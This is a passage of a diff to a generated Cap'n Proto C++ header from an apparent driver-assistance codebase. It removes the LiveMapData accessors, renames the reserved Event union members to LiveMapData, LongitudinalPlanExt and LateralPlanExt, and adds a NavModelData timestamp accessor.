LiveMapData::Builder::setTurnSpeedLimitsAhead( ::capnp::List::Reader value) { - ::capnp::_::PointerHelpers< ::capnp::List>::set(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS), value); -} -inline void LiveMapData::Builder::setTurnSpeedLimitsAhead(::kj::ArrayPtr value) { - ::capnp::_::PointerHelpers< ::capnp::List>::set(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS), value); -} -inline ::capnp::List::Builder LiveMapData::Builder::initTurnSpeedLimitsAhead(unsigned int size) { - return ::capnp::_::PointerHelpers< ::capnp::List>::init(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS), size); -} -inline void LiveMapData::Builder::adoptTurnSpeedLimitsAhead( - ::capnp::Orphan< ::capnp::List>&& value) { - ::capnp::_::PointerHelpers< ::capnp::List>::adopt(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS), kj::mv(value)); -} -inline ::capnp::Orphan< ::capnp::List> LiveMapData::Builder::disownTurnSpeedLimitsAhead() { - return ::capnp::_::PointerHelpers< ::capnp::List>::disown(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS)); -} - -inline bool LiveMapData::Reader::hasTurnSpeedLimitsAheadDistances() const { - return !_reader.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS).isNull(); -} -inline bool LiveMapData::Builder::hasTurnSpeedLimitsAheadDistances() { - return !_builder.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS).isNull(); -} -inline ::capnp::List::Reader LiveMapData::Reader::getTurnSpeedLimitsAheadDistances() const { - return ::capnp::_::PointerHelpers< ::capnp::List>::get(_reader.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS)); -} -inline ::capnp::List::Builder LiveMapData::Builder::getTurnSpeedLimitsAheadDistances() { - return ::capnp::_::PointerHelpers< ::capnp::List>::get(_builder.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS)); -} -inline void LiveMapData::Builder::setTurnSpeedLimitsAheadDistances( ::capnp::List::Reader value) { - ::capnp::_::PointerHelpers< ::capnp::List>::set(_builder.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS), value); -} -inline void LiveMapData::Builder::setTurnSpeedLimitsAheadDistances(::kj::ArrayPtr value) { - ::capnp::_::PointerHelpers< ::capnp::List>::set(_builder.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS), value); -} -inline ::capnp::List::Builder LiveMapData::Builder::initTurnSpeedLimitsAheadDistances(unsigned int size) { - return ::capnp::_::PointerHelpers< ::capnp::List>::init(_builder.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS), size); -} -inline void LiveMapData::Builder::adoptTurnSpeedLimitsAheadDistances( - ::capnp::Orphan< ::capnp::List>&& value) { - ::capnp::_::PointerHelpers< ::capnp::List>::adopt(_builder.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS), kj::mv(value)); -} -inline ::capnp::Orphan< ::capnp::List> LiveMapData::Builder::disownTurnSpeedLimitsAheadDistances() { - return ::capnp::_::PointerHelpers< ::capnp::List>::disown(_builder.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS)); -} - -inline bool LiveMapData::Reader::hasTurnSpeedLimitsAheadSigns() const { - return !_reader.getPointerField( - ::capnp::bounded<2>() * ::capnp::POINTERS).isNull(); -} -inline bool LiveMapData::Builder::hasTurnSpeedLimitsAheadSigns() { - return !_builder.getPointerField( - ::capnp::bounded<2>() * ::capnp::POINTERS).isNull(); -} -inline ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>::Reader LiveMapData::Reader::getTurnSpeedLimitsAheadSigns() const { - return ::capnp::_::PointerHelpers< ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>>::get(_reader.getPointerField( - ::capnp::bounded<2>() * ::capnp::POINTERS)); -} -inline ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>::Builder LiveMapData::Builder::getTurnSpeedLimitsAheadSigns() { - return ::capnp::_::PointerHelpers< ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>>::get(_builder.getPointerField( - ::capnp::bounded<2>() * ::capnp::POINTERS)); -} -inline void LiveMapData::Builder::setTurnSpeedLimitsAheadSigns( ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>::Reader value) { - ::capnp::_::PointerHelpers< ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>>::set(_builder.getPointerField( - ::capnp::bounded<2>() * ::capnp::POINTERS), value); -} -inline void LiveMapData::Builder::setTurnSpeedLimitsAheadSigns(::kj::ArrayPtr value) { - ::capnp::_::PointerHelpers< ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>>::set(_builder.getPointerField( - ::capnp::bounded<2>() * ::capnp::POINTERS), value); -} -inline ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>::Builder LiveMapData::Builder::initTurnSpeedLimitsAheadSigns(unsigned int size) { - return ::capnp::_::PointerHelpers< ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>>::init(_builder.getPointerField( - ::capnp::bounded<2>() * ::capnp::POINTERS), size); -} -inline void LiveMapData::Builder::adoptTurnSpeedLimitsAheadSigns( - ::capnp::Orphan< ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>>&& value) { - ::capnp::_::PointerHelpers< ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>>::adopt(_builder.getPointerField( - ::capnp::bounded<2>() * ::capnp::POINTERS), kj::mv(value)); -} -inline ::capnp::Orphan< ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>> LiveMapData::Builder::disownTurnSpeedLimitsAheadSigns() { - return ::capnp::_::PointerHelpers< ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>>::disown(_builder.getPointerField( - ::capnp::bounded<2>() * ::capnp::POINTERS)); -} - -inline ::int64_t LiveMapData::Reader::getLastGpsTimestamp() const { - return _reader.getDataField< ::int64_t>( - ::capnp::bounded<3>() * ::capnp::ELEMENTS); -} - -inline ::int64_t LiveMapData::Builder::getLastGpsTimestamp() { - return _builder.getDataField< ::int64_t>( - ::capnp::bounded<3>() * ::capnp::ELEMENTS); -} -inline void LiveMapData::Builder::setLastGpsTimestamp( ::int64_t value) { - _builder.setDataField< ::int64_t>( - ::capnp::bounded<3>() * ::capnp::ELEMENTS, value); -} - -inline bool LiveMapData::Reader::hasCurrentRoadName() const { - return !_reader.getPointerField( - ::capnp::bounded<3>() * ::capnp::POINTERS).isNull(); -} -inline bool LiveMapData::Builder::hasCurrentRoadName() { - return !_builder.getPointerField( - ::capnp::bounded<3>() * ::capnp::POINTERS).isNull(); -} -inline ::capnp::Text::Reader LiveMapData::Reader::getCurrentRoadName() const { - return ::capnp::_::PointerHelpers< ::capnp::Text>::get(_reader.getPointerField( - ::capnp::bounded<3>() * ::capnp::POINTERS)); -} -inline ::capnp::Text::Builder LiveMapData::Builder::getCurrentRoadName() { - return ::capnp::_::PointerHelpers< ::capnp::Text>::get(_builder.getPointerField( - ::capnp::bounded<3>() * ::capnp::POINTERS)); -} -inline void LiveMapData::Builder::setCurrentRoadName( ::capnp::Text::Reader value) { - ::capnp::_::PointerHelpers< ::capnp::Text>::set(_builder.getPointerField( - ::capnp::bounded<3>() * ::capnp::POINTERS), value); -} -inline ::capnp::Text::Builder LiveMapData::Builder::initCurrentRoadName(unsigned int size) { - return ::capnp::_::PointerHelpers< ::capnp::Text>::init(_builder.getPointerField( - ::capnp::bounded<3>() * ::capnp::POINTERS), size); -} -inline void LiveMapData::Builder::adoptCurrentRoadName( - ::capnp::Orphan< ::capnp::Text>&& value) { - ::capnp::_::PointerHelpers< ::capnp::Text>::adopt(_builder.getPointerField( - ::capnp::bounded<3>() * ::capnp::POINTERS), kj::mv(value)); -} -inline ::capnp::Orphan< ::capnp::Text> LiveMapData::Builder::disownCurrentRoadName() { - return ::capnp::_::PointerHelpers< ::capnp::Text>::disown(_builder.getPointerField( - ::capnp::bounded<3>() * ::capnp::POINTERS)); -} - -inline double LiveMapData::Reader::getLastGpsLatitude() const { - return _reader.getDataField( - ::capnp::bounded<4>() * ::capnp::ELEMENTS); -} - -inline double LiveMapData::Builder::getLastGpsLatitude() { - return _builder.getDataField( - ::capnp::bounded<4>() * ::capnp::ELEMENTS); -} -inline void LiveMapData::Builder::setLastGpsLatitude(double value) { - _builder.setDataField( - ::capnp::bounded<4>() * ::capnp::ELEMENTS, value); -} - -inline double LiveMapData::Reader::getLastGpsLongitude() const { - return _reader.getDataField( - ::capnp::bounded<5>() * ::capnp::ELEMENTS); -} - -inline double LiveMapData::Builder::getLastGpsLongitude() { - return _builder.getDataField( - ::capnp::bounded<5>() * ::capnp::ELEMENTS); -} -inline void LiveMapData::Builder::setLastGpsLongitude(double value) { - _builder.setDataField( - ::capnp::bounded<5>() * ::capnp::ELEMENTS, value); -} - -inline float LiveMapData::Reader::getLastGpsSpeed() const { - return _reader.getDataField( - ::capnp::bounded<12>() * ::capnp::ELEMENTS); -} - -inline float LiveMapData::Builder::getLastGpsSpeed() { - return _builder.getDataField( - ::capnp::bounded<12>() * ::capnp::ELEMENTS); -} -inline void LiveMapData::Builder::setLastGpsSpeed(float value) { - _builder.setDataField( - ::capnp::bounded<12>() * ::capnp::ELEMENTS, value); -} - -inline float LiveMapData::Reader::getLastGpsBearingDeg() const { - return _reader.getDataField( - ::capnp::bounded<13>() * ::capnp::ELEMENTS); -} - -inline float LiveMapData::Builder::getLastGpsBearingDeg() { - return _builder.getDataField( - ::capnp::bounded<13>() * ::capnp::ELEMENTS); -} -inline void LiveMapData::Builder::setLastGpsBearingDeg(float value) { - _builder.setDataField( - ::capnp::bounded<13>() * ::capnp::ELEMENTS, value); -} - -inline float LiveMapData::Reader::getLastGpsAccuracy() const { - return _reader.getDataField( - ::capnp::bounded<14>() * ::capnp::ELEMENTS); -} - -inline float LiveMapData::Builder::getLastGpsAccuracy() { - return _builder.getDataField( - ::capnp::bounded<14>() * ::capnp::ELEMENTS); -} -inline void LiveMapData::Builder::setLastGpsAccuracy(float value) { - _builder.setDataField( - ::capnp::bounded<14>() * ::capnp::ELEMENTS, value); -} - -inline float LiveMapData::Reader::getLastGpsBearingAccuracyDeg() const { - return _reader.getDataField( - ::capnp::bounded<15>() * ::capnp::ELEMENTS); -} - -inline float LiveMapData::Builder::getLastGpsBearingAccuracyDeg() { - return _builder.getDataField( - ::capnp::bounded<15>() * ::capnp::ELEMENTS); -} -inline void LiveMapData::Builder::setLastGpsBearingAccuracyDeg(float value) { - _builder.setDataField( - ::capnp::bounded<15>() * ::capnp::ELEMENTS, value); -} - inline ::cereal::Sentinel::SentinelType Sentinel::Reader::getType() const { return _reader.getDataField< ::cereal::Sentinel::SentinelType>( ::capnp::bounded<0>() * ::capnp::ELEMENTS); @@ -45877,6 +44818,20 @@ inline ::capnp::Orphan< ::capnp::List> NavMode ::capnp::bounded<2>() * ::capnp::POINTERS)); } +inline ::uint64_t NavModelData::Reader::getLocationMonoTime() const { + return _reader.getDataField< ::uint64_t>( + ::capnp::bounded<2>() * ::capnp::ELEMENTS); +} + +inline ::uint64_t NavModelData::Builder::getLocationMonoTime() { + return _builder.getDataField< ::uint64_t>( + ::capnp::bounded<2>() * ::capnp::ELEMENTS); +} +inline void NavModelData::Builder::setLocationMonoTime( ::uint64_t value) { + _builder.setDataField< ::uint64_t>( + ::capnp::bounded<2>() * ::capnp::ELEMENTS, value); +} + inline bool NavModelData::XYData::Reader::hasX() const { return !_reader.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS).isNull(); @@ -51913,165 +50868,165 @@ inline ::capnp::Orphan< ::cereal::UiPlan> Event::Builder::disownUiPlan() { ::capnp::bounded<0>() * ::capnp::POINTERS)); } -inline bool Event::Reader::isCustomReserved0() const { - return which() == Event::CUSTOM_RESERVED0; +inline bool Event::Reader::isLiveMapData() const { + return which() == Event::LIVE_MAP_DATA; } -inline bool Event::Builder::isCustomReserved0() { - return which() == Event::CUSTOM_RESERVED0; +inline bool Event::Builder::isLiveMapData() { + return which() == Event::LIVE_MAP_DATA; } -inline bool Event::Reader::hasCustomReserved0() const { - if (which() != Event::CUSTOM_RESERVED0) return false; +inline bool Event::Reader::hasLiveMapData() const { + if (which() != Event::LIVE_MAP_DATA) return false; return !_reader.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS).isNull(); } -inline bool Event::Builder::hasCustomReserved0() { - if (which() != Event::CUSTOM_RESERVED0) return false; +inline bool Event::Builder::hasLiveMapData() { + if (which() != Event::LIVE_MAP_DATA) return false; return !_builder.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS).isNull(); } -inline ::cereal::CustomReserved0::Reader Event::Reader::getCustomReserved0() const { - KJ_IREQUIRE((which() == Event::CUSTOM_RESERVED0), +inline ::cereal::LiveMapData::Reader Event::Reader::getLiveMapData() const { + KJ_IREQUIRE((which() == Event::LIVE_MAP_DATA), "Must check which() before get()ing a union member."); - return ::capnp::_::PointerHelpers< ::cereal::CustomReserved0>::get(_reader.getPointerField( + return ::capnp::_::PointerHelpers< ::cereal::LiveMapData>::get(_reader.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS)); } -inline ::cereal::CustomReserved0::Builder Event::Builder::getCustomReserved0() { - KJ_IREQUIRE((which() == Event::CUSTOM_RESERVED0), +inline ::cereal::LiveMapData::Builder Event::Builder::getLiveMapData() { + KJ_IREQUIRE((which() == Event::LIVE_MAP_DATA), "Must check which() before get()ing a union member."); - return ::capnp::_::PointerHelpers< ::cereal::CustomReserved0>::get(_builder.getPointerField( + return ::capnp::_::PointerHelpers< ::cereal::LiveMapData>::get(_builder.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS)); } -inline void Event::Builder::setCustomReserved0( ::cereal::CustomReserved0::Reader value) { +inline void Event::Builder::setLiveMapData( ::cereal::LiveMapData::Reader value) { _builder.setDataField( - ::capnp::bounded<4>() * ::capnp::ELEMENTS, Event::CUSTOM_RESERVED0); - ::capnp::_::PointerHelpers< ::cereal::CustomReserved0>::set(_builder.getPointerField( + ::capnp::bounded<4>() * ::capnp::ELEMENTS, Event::LIVE_MAP_DATA); + ::capnp::_::PointerHelpers< ::cereal::LiveMapData>::set(_builder.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS), value); } -inline ::cereal::CustomReserved0::Builder Event::Builder::initCustomReserved0() { +inline ::cereal::LiveMapData::Builder Event::Builder::initLiveMapData() { _builder.setDataField( - ::capnp::bounded<4>() * ::capnp::ELEMENTS, Event::CUSTOM_RESERVED0); - return ::capnp::_::PointerHelpers< ::cereal::CustomReserved0>::init(_builder.getPointerField( + ::capnp::bounded<4>() * ::capnp::ELEMENTS, Event::LIVE_MAP_DATA); + return ::capnp::_::PointerHelpers< ::cereal::LiveMapData>::init(_builder.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS)); } -inline void Event::Builder::adoptCustomReserved0( - ::capnp::Orphan< ::cereal::CustomReserved0>&& value) { +inline void Event::Builder::adoptLiveMapData( + ::capnp::Orphan< ::cereal::LiveMapData>&& value) { _builder.setDataField( - ::capnp::bounded<4>() * ::capnp::ELEMENTS, Event::CUSTOM_RESERVED0); - ::capnp::_::PointerHelpers< ::cereal::CustomReserved0>::adopt(_builder.getPointerField( + ::capnp::bounded<4>() * ::capnp::ELEMENTS, Event::LIVE_MAP_DATA); + ::capnp::_::PointerHelpers< ::cereal::LiveMapData>::adopt(_builder.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS), kj::mv(value)); } -inline ::capnp::Orphan< ::cereal::CustomReserved0> Event::Builder::disownCustomReserved0() { - KJ_IREQUIRE((which() == Event::CUSTOM_RESERVED0), +inline ::capnp::Orphan< ::cereal::LiveMapData> Event::Builder::disownLiveMapData() { + KJ_IREQUIRE((which() == Event::LIVE_MAP_DATA), "Must check which() before get()ing a union member."); - return ::capnp::_::PointerHelpers< ::cereal::CustomReserved0>::disown(_builder.getPointerField( + return ::capnp::_::PointerHelpers< ::cereal::LiveMapData>::disown(_builder.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS)); } -inline bool Event::Reader::isCustomReserved1() const { - return which() == Event::CUSTOM_RESERVED1; +inline bool Event::Reader::isLongitudinalPlanExt() const { + return which() == Event::LONGITUDINAL_PLAN_EXT; } -inline bool Event::Builder::isCustomReserved1() { - return which() == Event::CUSTOM_RESERVED1; +inline bool Event::Builder::isLongitudinalPlanExt() { + return which() == Event::LONGITUDINAL_PLAN_EXT; } -inline bool Event::Reader::hasCustomReserved1() const { - if (which() != Event::CUSTOM_RESERVED1) return false; +inline bool Event::Reader::hasLongitudinalPlanExt() const { + if (which() != Event::LONGITUDINAL_PLAN_EXT) return false; return !_reader.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS).isNull(); } -inline bool Event::Builder::hasCustomReserved1() { - if (which() != Event::CUSTOM_RESERVED1) return false; +inline bool Event::Builder::hasLongitudinalPlanExt() { + if (which() != Event::LONGITUDINAL_PLAN_EXT) return false; return !_builder.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS).isNull(); } -inline ::cereal::CustomReserved1::Reader Event::Reader::getCustomReserved1() const { - KJ_IREQUIRE((which() == Event::CUSTOM_RESERVED1), +inline ::cereal::LongitudinalPlanExt::Reader Event::Reader::getLongitudinalPlanExt() const { + KJ_IREQUIRE((which() == Event::LONGITUDINAL_PLAN_EXT), "Must check which() before get()ing a union member."); - return ::capnp::_::PointerHelpers< ::cereal::CustomReserved1>::get(_reader.getPointerField( + return ::capnp::_::PointerHelpers< ::cereal::LongitudinalPlanExt>::get(_reader.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS)); } -inline ::cereal::CustomReserved1::Builder Event::Builder::getCustomReserved1() { - KJ_IREQUIRE((which() == Event::CUSTOM_RESERVED1), +inline ::cereal::LongitudinalPlanExt::Builder Event::Builder::getLongitudinalPlanExt() { + KJ_IREQUIRE((which() == Event::LONGITUDINAL_PLAN_EXT), "Must check which() before get()ing a union member."); - return ::capnp::_::PointerHelpers< ::cereal::CustomReserved1>::get(_builder.getPointerField( + return ::capnp::_::PointerHelpers< ::cereal::LongitudinalPlanExt>::get(_builder.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS)); } -inline void Event::Builder::setCustomReserved1( ::cereal::CustomReserved1::Reader value) { +inline void Event::Builder::setLongitudinalPlanExt( ::cereal::LongitudinalPlanExt::Reader value) { _builder.setDataField( - ::capnp::bounded<4>() * ::capnp::ELEMENTS, Event::CUSTOM_RESERVED1); - ::capnp::_::PointerHelpers< ::cereal::CustomReserved1>::set(_builder.getPointerField( + ::capnp::bounded<4>() * ::capnp::ELEMENTS, Event::LONGITUDINAL_PLAN_EXT); + ::capnp::_::PointerHelpers< ::cereal::LongitudinalPlanExt>::set(_builder.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS), value); } -inline ::cereal::CustomReserved1::Builder Event::Builder::initCustomReserved1() { +inline ::cereal::LongitudinalPlanExt::Builder Event::Builder::initLongitudinalPlanExt() { _builder.setDataField( - ::capnp::bounded<4>() * ::capnp::ELEMENTS, Event::CUSTOM_RESERVED1); - return ::capnp::_::PointerHelpers< ::cereal::CustomReserved1>::init(_builder.getPointerField( + ::capnp::bounded<4>() * ::capnp::ELEMENTS, Event::LONGITUDINAL_PLAN_EXT); + return ::capnp::_::PointerHelpers< ::cereal::LongitudinalPlanExt>::init(_builder.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS)); } -inline void Event::Builder::adoptCustomReserved1( - ::capnp::Orphan< ::cereal::CustomReserved1>&& value) { +inline void Event::Builder::adoptLongitudinalPlanExt( + ::capnp::Orphan< ::cereal::LongitudinalPlanExt>&& value) { _builder.setDataField( - ::capnp::bounded<4>() * ::capnp::ELEMENTS, Event::CUSTOM_RESERVED1); - ::capnp::_::PointerHelpers< ::cereal::CustomReserved1>::adopt(_builder.getPointerField( + ::capnp::bounded<4>() * ::capnp::ELEMENTS, Event::LONGITUDINAL_PLAN_EXT); + ::capnp::_::PointerHelpers< ::cereal::LongitudinalPlanExt>::adopt(_builder.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS), kj::mv(value)); } -inline ::capnp::Orphan< ::cereal::CustomReserved1> Event::Builder::disownCustomReserved1() { - KJ_IREQUIRE((which() == Event::CUSTOM_RESERVED1), +inline ::capnp::Orphan< ::cereal::LongitudinalPlanExt> Event::Builder::disownLongitudinalPlanExt() { + KJ_IREQUIRE((which() == Event::LONGITUDINAL_PLAN_EXT), "Must check which() before get()ing a union member."); - return ::capnp::_::PointerHelpers< ::cereal::CustomReserved1>::disown(_builder.getPointerField( + return ::capnp::_::PointerHelpers< ::cereal::LongitudinalPlanExt>::disown(_builder.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS)); } -inline bool Event::Reader::isCustomReserved2() const { - return which() == Event::CUSTOM_RESERVED2; +inline bool Event::Reader::isLateralPlanExt() const { + return which() == Event::LATERAL_PLAN_EXT; } -inline bool Event::Builder::isCustomReserved2() { - return which() == Event::CUSTOM_RESERVED2; +inline bool Event::Builder::isLateralPlanExt() { + return which() == Event::LATERAL_PLAN_EXT; } -inline bool Event::Reader::hasCustomReserved2() const { - if (which() != Event::CUSTOM_RESERVED2) return false; +inline bool Event::Reader::hasLateralPlanExt() const { + if (which() != Event::LATERAL_PLAN_EXT) return false; return !_reader.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS).isNull(); } -inline bool Event::Builder::hasCustomReserved2() { - if (which() != Event::CUSTOM_RESERVED2) return false; +inline bool Event::Builder::hasLateralPlanExt() { + if (which() != Event::LATERAL_PLAN_EXT) return false; return !_builder.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS).isNull(); } -inline ::cereal::CustomReserved2::Reader Event::Reader::getCustomReserved2() const { - KJ_IREQUIRE((which() == Event::CUSTOM_RESERVED2), +inline ::cereal::LateralPlanExt::Reader Event::Reader::getLateralPlanExt() const { + KJ_IREQUIRE((which() == Event::LATERAL_PLAN_EXT), "Must check which() before get()ing a union member."); - return ::capnp::_::PointerHelpers< ::cereal::CustomReserved2>::get(_reader.getPointerField( + return ::capnp::_::PointerHelpers< ::cereal::LateralPlanExt>::get(_reader.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS)); } -inline ::cereal::CustomReserved2::Builder Event::Builder::getCustomReserved2() { - KJ_IREQUIRE((which() == Event::CUSTOM_RESERVED2), +inline ::cereal::LateralPlanExt::Builder Event::Builder::getLateralPlanExt() { + KJ_IREQUIRE((which() == Event::LATERAL_PLAN_EXT), "Must check which() before get()ing a union member."); - return ::capnp::_::PointerHelpers< ::cereal::CustomReserved2>::get(_builder.getPointerField( + return ::capnp::_::PointerHelpers< ::cereal::LateralPlanExt>::get(_builder.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS)); } -inline void Event::Builder::setCustomReserved2( ::cereal::CustomReserved2::Reader value) { +inline void Event::Builder::setLateralPlanExt( ::cereal::LateralPlanExt::Reader value) { _builder.setDataField( - ::capnp::bounded<4>() * ::capnp::ELEMENTS, Event::CUSTOM_RESERVED2); - ::capnp::_::PointerHelpers< ::cereal::CustomReserved2>::set(_builder.getPointerField( + ::capnp::bounded<4>() * ::capnp::ELEMENTS, Event::LATERAL_PLAN_EXT); + ::capnp::_::PointerHelpers< ::cereal::LateralPlanExt>::set(_builder.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS), value); } -inline ::cereal::CustomReserved2::Builder Event::Builder::initCustomReserved2() { +inline ::cereal::LateralPlanExt::Builder Event::Builder::initLateralPlanExt() { _builder.setDataField( - ::capnp::bounded<4>() * ::capnp::ELEMENTS, Event::CUSTOM_RESERVED2); - return ::capnp::_::PointerHelpers< ::cereal::CustomReserved2>::init(_builder.getPointerField( + ::capnp::bounded<4>() * ::capnp::ELEMENTS, Event::LATERAL_PLAN_EXT); + return ::capnp::_::PointerHelpers< ::cereal::LateralPlanExt>::init(_builder.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS)); } -inline void Event::Builder::adoptCustomReserved2( - ::capnp::Orphan< ::cereal::CustomReserved2>&& value) { +inline void Event::Builder::adoptLateralPlanExt( + ::capnp::Orphan< ::cereal::LateralPlanExt>&& value) { _builder.setDataField( - ::capnp::bounded<4>() * ::capnp::ELEMENTS, Event::CUSTOM_RESERVED2); - ::capnp::_::PointerHelpers< ::cereal::CustomReserved2>::adopt(_builder.getPointerField( + ::capnp::bounded<4>() * ::capnp::ELEMENTS, Event::LATERAL_PLAN_EXT); + ::capnp::_::PointerHelpers< ::cereal::LateralPlanExt>::adopt(_builder.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS), kj::mv(value)); } -inline ::capnp::Orphan< ::cereal::CustomReserved2> Event::Builder::disownCustomReserved2() { - KJ_IREQUIRE((which() == Event::CUSTOM_RESERVED2), +inline ::capnp::Orphan< ::cereal::LateralPlanExt> Event::Builder::disownLateralPlanExt() { + KJ_IREQUIRE((which() == Event::LATERAL_PLAN_EXT), "Must check which() before get()ing a union member."); - return ::capnp::_::PointerHelpers< ::cereal::CustomReserved2>::disown(_builder.getPointerField( + return ::capnp::_::PointerHelpers< ::cereal::LateralPlanExt>::disown(_builder.getPointerField( ::capnp::bounded<0>() * ::capnp::POINTERS)); } @@ -52777,113 +51732,5 @@ inline ::capnp::Orphan< ::cereal::EncodeData> Event::Builder::disownLivestreamDr ::capnp::bounded<0>() * ::capnp::POINTERS)); } -inline bool Event::Reader::isDragonConf() const { - return which() == Event::DRAGON_CONF; -} -inline bool Event::Builder::isDragonConf() { - return which() == Event::DRAGON_CONF; -} -inline bool Event::Reader::hasDragonConf() const { - if (which() != Event::DRAGON_CONF) return false; - return !_reader.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS).isNull(); -} -inline bool Event::Builder::hasDragonConf() { - if (which() != Event::DRAGON_CONF) return false; - return !_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS).isNull(); -} -inline ::cereal::DragonConf::Reader Event::Reader::getDragonConf() const { - KJ_IREQUIRE((which() == Event::DRAGON_CONF), - "Must check which() before get()ing a union member."); - return ::capnp::_::PointerHelpers< ::cereal::DragonConf>::get(_reader.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS)); -} -inline ::cereal::DragonConf::Builder Event::Builder::getDragonConf() { - KJ_IREQUIRE((which() == Event::DRAGON_CONF), - "Must check which() before get()ing a union member."); - return ::capnp::_::PointerHelpers< ::cereal::DragonConf>::get(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS)); -} -inline void Event::Builder::setDragonConf( ::cereal::DragonConf::Reader value) { - _builder.setDataField( - ::capnp::bounded<4>() * ::capnp::ELEMENTS, Event::DRAGON_CONF); - ::capnp::_::PointerHelpers< ::cereal::DragonConf>::set(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS), value); -} -inline ::cereal::DragonConf::Builder Event::Builder::initDragonConf() { - _builder.setDataField( - ::capnp::bounded<4>() * ::capnp::ELEMENTS, Event::DRAGON_CONF); - return ::capnp::_::PointerHelpers< ::cereal::DragonConf>::init(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS)); -} -inline void Event::Builder::adoptDragonConf( - ::capnp::Orphan< ::cereal::DragonConf>&& value) { - _builder.setDataField( - ::capnp::bounded<4>() * ::capnp::ELEMENTS, Event::DRAGON_CONF); - ::capnp::_::PointerHelpers< ::cereal::DragonConf>::adopt(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS), kj::mv(value)); -} -inline ::capnp::Orphan< ::cereal::DragonConf> Event::Builder::disownDragonConf() { - KJ_IREQUIRE((which() == Event::DRAGON_CONF), - "Must check which() before get()ing a union member."); - return ::capnp::_::PointerHelpers< ::cereal::DragonConf>::disown(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS)); -} - -inline bool Event::Reader::isLiveMapData() const { - return which() == Event::LIVE_MAP_DATA; -} -inline bool Event::Builder::isLiveMapData() { - return which() == Event::LIVE_MAP_DATA; -} -inline bool Event::Reader::hasLiveMapData() const { - if (which() != Event::LIVE_MAP_DATA) return false; - return !_reader.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS).isNull(); -} -inline bool Event::Builder::hasLiveMapData() { - if (which() != Event::LIVE_MAP_DATA) return false; - return !_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS).isNull(); -} -inline ::cereal::LiveMapData::Reader Event::Reader::getLiveMapData() const { - KJ_IREQUIRE((which() == Event::LIVE_MAP_DATA), - "Must check which() before get()ing a union member."); - return ::capnp::_::PointerHelpers< ::cereal::LiveMapData>::get(_reader.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS)); -} -inline ::cereal::LiveMapData::Builder Event::Builder::getLiveMapData() { - KJ_IREQUIRE((which() == Event::LIVE_MAP_DATA), - "Must check which() before get()ing a union member."); - return ::capnp::_::PointerHelpers< ::cereal::LiveMapData>::get(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS)); -} -inline void Event::Builder::setLiveMapData( ::cereal::LiveMapData::Reader value) { - _builder.setDataField( - ::capnp::bounded<4>() * ::capnp::ELEMENTS, Event::LIVE_MAP_DATA); - ::capnp::_::PointerHelpers< ::cereal::LiveMapData>::set(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS), value); -} -inline ::cereal::LiveMapData::Builder Event::Builder::initLiveMapData() { - _builder.setDataField( - ::capnp::bounded<4>() * ::capnp::ELEMENTS, Event::LIVE_MAP_DATA); - return 